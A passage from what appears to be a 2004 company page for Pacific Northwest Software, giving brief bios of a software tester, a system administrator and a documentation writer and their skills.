Kelly's experience of 3 years consists of software testing, developing and executing test plans, developing and executing test cases, analyzing the results of test plans and test cases, and determining when bugs have been fixed satisfactorily. She also has experience programming in Visual Basic, Java, Perl. She has web development experience using HTML, PHP, ASP, Perl CGI, JavaScript. She has developed databases using SQLServer, Access, Oracle, PostGreSQL.

Wayne Chang, System Administrator

Wayne sets up and manages the computers that PNWSoft uses including a mix of Windows and Linux servers. He also manages and configures the software that those systems run.

Ed Winkle, Writer and Editor

Ed Winkle writes the manuals and other documentation that PNWSoft provides. He also is an excellent content editor for the online information on the projects that we work on.

© Copyright 2004 Pacific Northwest Software, All Rights Reserved.